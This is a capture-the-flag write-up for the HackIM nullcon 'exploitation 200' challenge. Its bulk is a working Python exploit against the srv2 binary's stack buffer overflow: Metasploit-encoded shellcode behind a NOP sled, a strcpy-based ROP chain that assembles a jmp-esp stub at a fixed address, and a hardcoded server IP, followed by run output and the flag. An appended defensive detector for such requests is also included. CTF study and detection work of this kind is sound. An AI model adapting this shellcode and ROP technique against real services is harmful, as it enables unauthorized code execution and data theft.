HackIM nullcon exploitation 200 write-up [exploit]

0x10 Information Security/0x15 System

by sweetchip 2014. 1. 27. 15:23




Topic: Simple stack based buffer overflow


Binary: srv2



from socket import *
import struct
import time

# pack a 32-bit little-endian value (addresses in the ROP chain below)
p = lambda x : struct.pack("<I", x)

ip = "192.168.0.109"   # local test box
ip = "23.23.190.205"   # challenge server
port = 6776

"""
/*
 * linux/x86/read_file - 97 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, PATH=flag.txt, FD=4
 */
"""

shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"
"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"
"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"
"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"
"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"
"\x03\x39\x24\xd4\xbb\xb1\x38")

# NOP sled in front of the shellcode
shellcode = "\x90"*100 + shellcode

s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))

# addresses taken from the binary (no PIE, so these are fixed)
recv = 0x08048720
send = 0x08048750
strcpy = 0x08048640
freespace = 0x0804b301   # writable, non-randomised location to assemble a stub in
pr = 0x08048b54

nnjesp = 0x9090ffe4      # jmp esp ; nop ; nop (built byte by byte below)

raw_input("go? ")

payload = ":"
payload += "A" * (0xdc - len(payload))
payload += "BBBB"
payload += "\x0a"

# each strcpy(freespace + i, src) copies one byte (plus NUL) out of the binary
# into freespace, so that freespace ends up holding ff e4 90 90 = jmp esp ; nop ; nop
payload += p(strcpy)
payload += p(pr-1) # ppr
payload += p(freespace)
payload += p(0x08048640) # 0xff

payload += p(strcpy)
payload += p(pr-1) # ppr
payload += p(freespace + 1)
payload += p(0x08048766) # 0xe4

payload += p(strcpy)
payload += p(pr-1) # ppr
payload += p(freespace + 2)
payload += p(0x08048e57) # 0x90

payload += p(strcpy)
payload += p(pr-1) # ppr
payload += p(freespace + 3)
payload += p(0x08048e57) # 0x90

payload += p(freespace) # jmp esp
payload += shellcode # <-- esp!!

s.recv(1024)

print "[*] Sending Exploit.."
time.sleep(1)
s.send(payload + "\n")

print "[*] cat key :D"
time.sleep(1)
print s.recv(1024)

raw_input("> ")

"""
C:\Users\Administrator\Desktop\nullcon>ex2.py
go?
[*] Sending Exploit..
[*] cat key :D
6ffcffda1c58f6dbe4dcd5b715de538c

>

C:\Users\Administrator\Desktop\nullcon>
"""


The binary contains a simple stack-based buffer overflow.

The exploit is written on the assumption that ASLR is enabled, which is why the jmp esp stub is assembled at a fixed address in the binary's own writable data instead of relying on a stack address.
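As an added example that is not part of the original post: a small Python 3 check a defender could run over requests captured on srv2's port (6776). The buffer size, the NOP-run threshold and the two sample requests are assumptions derived from the exploit's layout above, not from the binary itself.

```python
import re

BUF_SIZE = 0xdc      # stack buffer size implied by the exploit's 0xdc-byte padding (assumption)
MAX_NOP_RUN = 16     # a run of 0x90 this long has no place in a text protocol (assumption)

def is_printable(b):
    """ASCII text plus the whitespace a line-oriented protocol legitimately uses."""
    return 0x20 <= b <= 0x7e or b in (0x09, 0x0a, 0x0d)

def analyse_request(data):
    """Return the reasons one request to srv2 looks like the overflow attempt.
    An empty list means nothing suspicious was seen. `data` is the raw bytes of
    a single recv(), not just the first line, because the exploit places its
    ROP chain after an embedded newline."""
    reasons = []
    if len(data) > BUF_SIZE:
        reasons.append("request of %d bytes exceeds the %d-byte buffer" % (len(data), BUF_SIZE))
    nop_run = max((len(m.group(0)) for m in re.finditer(rb"\x90+", data)), default=0)
    if nop_run >= MAX_NOP_RUN:
        reasons.append("NOP sled of %d bytes" % nop_run)
    binary = sum(1 for b in data if not is_printable(b))
    if binary:
        reasons.append("%d non-printable bytes in a text request" % binary)
    return reasons

# Constructed samples, not captured traffic: a normal request and one shaped like
# the exploit (padding, saved-EBP overwrite, NOP sled, int3 bytes in place of shellcode).
BENIGN = b":hello srv2\n"
OVERFLOW = b":" + b"A" * (BUF_SIZE - 1) + b"BBBB" + b"\n" + b"\x90" * 100 + b"\xcc" * 8 + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overflow", OVERFLOW)):
        print(name, analyse_request(sample) or "clean")
```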



Flag : 6ffcffda1c58f6dbe4dcd5b715de538c
